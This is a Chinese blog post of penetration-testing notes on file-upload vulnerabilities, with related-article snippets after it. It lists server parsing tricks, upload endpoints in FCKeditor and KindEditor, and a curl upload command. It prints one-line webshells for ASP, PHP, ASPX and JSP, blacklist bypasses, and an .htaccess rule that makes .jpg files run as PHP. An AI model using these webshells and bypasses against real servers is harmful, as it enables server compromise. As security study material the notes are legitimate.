文件上传总结

最新推荐文章于 2022-04-10 11:42:16 发布
最新推荐文章于 2022-04-10 11:42:16 发布
阅读量150 收藏
点赞数
分类专栏: 安全 文章标签: 安全漏洞 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46804551/article/details/113700482
版权

上传漏洞

常见脆弱容器上传方法
容器名称版本文件名
IIS6.0test.asp;.jpg /test.asp/test.jpg文件解析漏洞
IIS7.0test.jpg/.php默认开启cgi.fi
IIS7.5a.asp.a; .a.aspx.jpg…jpg默认开启cgi.fi
Nginx0.5.,0.6.,0.7<=0.765,0.8<=0.8.37/file.jpg%00.php00截断
编辑器漏洞
  • 百度编辑器 Ueditor

    controller.ashx?action=catchimage

  • FCKeditor

    查看版本

    • /fckeditor/editor/dialog/fck_about.html
    • /FCKeditor/_whatsnew.html

    上传页面

    • FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?
      Command=GetFoldersAndFiles& Type=lmage&CurrentFolder=/
    • FCKeditor/editor/filemanager/browser/default/browser.html?
      type=lmage&connector=connectors/asp/connector.asp
    • FCKeditor/editor/filemanager/browser/default/browser.html?
      Type=lmage&Connectorttp://www.site. com%2Ffckeditor%2Feditor92Ffilemanager%2Fcon
      nectors%2Fphp%2Fconnector. php (ver:2.6.3测试通过)
    • FCKeditor/editor/filemanager/browser/default/browser.html?
      Type=lmage&Connector=connectors/jsp/connector.jsp
      FCKeditor/editor/filemanager/browser/defaultconnectors/test.html
    • FCKeditor/editor/filemanager/upload/test.html
    • FCKeditor/editor/filemanager/connectors/test.html
    • FCKeditor/editor/filemanager/connectors/uploadtest.html
    • FCKeditor/editor/fckeditor.html不可以上传文件,可以点击上传图片按钮再选择浏览服务器即
      跳转至可t传立 件而
    上传思路
    • version 2.2版本

      Apache+linux环境下在上传文件后面加.突破

    • version<=2.4.2 for php

      在处理PHP上传的地方并未对Media类型进行上传文件类型的控制,导致用户上传任意文件

    • version 2.4.1

      修改CurrentFolder参数使用…/…/来进入不同的目录

      jsp版本:
    • version 2.0<=2.2

      允许上传asa,cer,php2,php4,inc,pwml,pht后缀的文件上传后它保存的文件直接用的

    KindEditor
    上传页面
    • kindeditor/asp/upload json.asp
    • kindeditor/asp.net/upload json.ashx
    • kindeditor/jsp/upload_ json.jsp
    • kindeditor/php/upload_ json.php
    上传思路
    kindeditor<=4.1.5

    curl -F “imFile=@1.php” http://127.0.0.1/test/kindeditor/php/upload_json.php?dir=file

    上传总结:

    文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接

    asp一句话

       	<%eval request('x')%>

    PHP一句话

        <?php eval($POST[X]); ?>

    aspx一句话

         <%@ Page Language='Jscript'%><%eval(Request.Item['x'],'unsafe');%>

    jsp一句话

    	<%Runtime.getRuntime().exec(request.getParameter("x"));%>
    服务器端的上传验证

    白名单验证定义允许上传的后缀类型,除此所有后缀都不允许

    黑名单验证

    定义不允许上传的后缀类型,除此之类其他后缀都可以上传

    定义不允许上传的后缀 asp,aspx,asa,cer,cdx,ashx

    突破方法

    未重命名可以配合解析漏洞

    可以用cer达到绕过效果

    如果未使用转换函数强制转换后缀为小写(Asp)

    特殊后缀达到效果,利用ashx来生成一句话

    .htaccess来实现后缀引导。上传jpg可以解析成脚本,具体在内容定义

    文件头验证

    伪造文件头

    文件类型验证

    添加./htaccess来实现绕过

  <FilesMatch ".jpg">

SetHandler application/x-httpd-php

    </FilesMatch>

表示jpg后缀的文件会被当做php文件解析

. iDea.
关注
专栏目录
java文件上传总结
congge
10-18 2万+
前言 文件上传是各类应用中经常碰到的需求,不管是上传图片、文件、音频、视频等,或者其他类型的文件,都是后端需要解决的,采用什么样的方式进行上传,或者对上传后的文件如何进行存储,甚至如何更加高效的上传文件等问题,都是在实际开发中需要解决的,本文将对常用的文件上传使用进行一下简单的小结 以springboot为例,下面我们就开始撸码吧,开工前我们还是做一下简单的准备吧,本文的演示demo框架为springboot2.2.1版本,只需简单引入一个下面的依赖即可,其他需要用到的,我们增量添加即可 <de
文件上传部分总结
sanc7ane的博客
02-23 1059
title: 文件上传总结 date: 2017-11-18 15:17:12 tags: WEB emmmmmmm之前班上小组分环境,我们组刚好做的文件上传漏洞。当时考察的是检测文件头验证绕过和apache解析漏洞。于是做一些相关总结文件上传漏洞是个非常常见且容易理解的一个漏洞,有很多的漏洞场景和利用方式。 现今文件上传的校验一般分为: 客户端javascript校验(也即是网页上一段...
struts2文件上传总结
最新发布
06-14
以下是对Struts2文件上传的详细总结: 1. **表单设计**: - 在HTML表单中,需添加`<input type="file" />`字段,例如`<input type="file" name="myUpload" />`。`name`属性对应Action类中的属性。 2. **Action类*...
ctf 文件上传总结
njqfb的博客
06-04 3368
前端绕过 正常上传文件,捉取数据包修改 后端绕过 服务器端检测的绕过 windows特性 windows对文件名自动去掉点 空格 ::$DATA(这个是ntfs的特性) 利用这个特性绕过黑名单限制 函数特性 move_uploaded_file函数会自动去除文件名末尾的点 和 /. fopen函数特性 <?php $filename='1.php/.'; $content="<?php eval($_POST[1]);?>"; $f = fopen($filename, 'w');
Struts2 文件上传总结
02-13
Struts2 文件上传Web开发中的一个重要组成部分,它允许用户从客户端向服务器传输文件,例如图片、文档等。本文将详细讲解Struts2框架中实现文件上传的两种常见方法,并探讨相关的注意事项和技术要点。 首先,我们...
PHP实现文件上传与下载实例与总结
12-18
首先,我们要理解文件上传的基本原理。文件上传的过程简单来说就是客户端通过HTML表单选择文件,然后使用POST方式提交表单,服务器端接收到文件后将其保存到指定目录。在这个过程中,表单需要设置`method="post"`和`...
文件上传总结
weixin_47389477的博客
04-10 349
需求:点击新增修改,弹框里面有文件上传的功能 思路: 文件上传时,走的时文件上传的接口,然后把调用接口成功后的值当成参数,传给新增接口 点击编辑修改时,假如此时客户没有修改文件上传,这时候我们就不用隐式文件上传,可以把上传的文件字段从对象参数中给删除掉,(原因是后台会更新传入修改的字段,如果这个字段值没有变化,那么后段还是返回原来数据值) 删除的方式是delete this.form.uploadFile // 合同附件 handleBeforeUpload(file) { co
文件上传总结
King
08-01 222
文件上传校验姿势: 1、客户端JavaScript校验(一般只校验后缀名) 2、服务端校验 文件头content-type字段校验(image/gif) 文件头内容校验(GIF89a) 后缀名白名单校验 后缀名黑名单校验 自定义正则校验 3、WAF设备校验(根据不同的WAF产品而定) 文件上传绕过校验姿势: 1、客户端绕过(抓包改包) 2、服务端绕过 文件类型 文件头 文...
文件上传功能的总结
csdn_0396的博客
02-28 288
头像上传功能
文件上传知识点总结
千寻的博客
02-07 3046
文章目录第一章 概述第一节 漏洞概述第二节 漏洞成因第三节 漏洞危害第二章 相关术语第一节 WebShell第二节 大马第三节 小马第四节 中国菜刀与一句话木马配合实现了三大基本功能第五节 GetShell第三章 文件上传的条件第一节 一定的条件第三章 策略黑白名单策略第三章 文件上传的利用PUT 方法上传文件第四章 文件上传的绕过第一节 前端限制与绕过第二节 服务器端检测--M...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值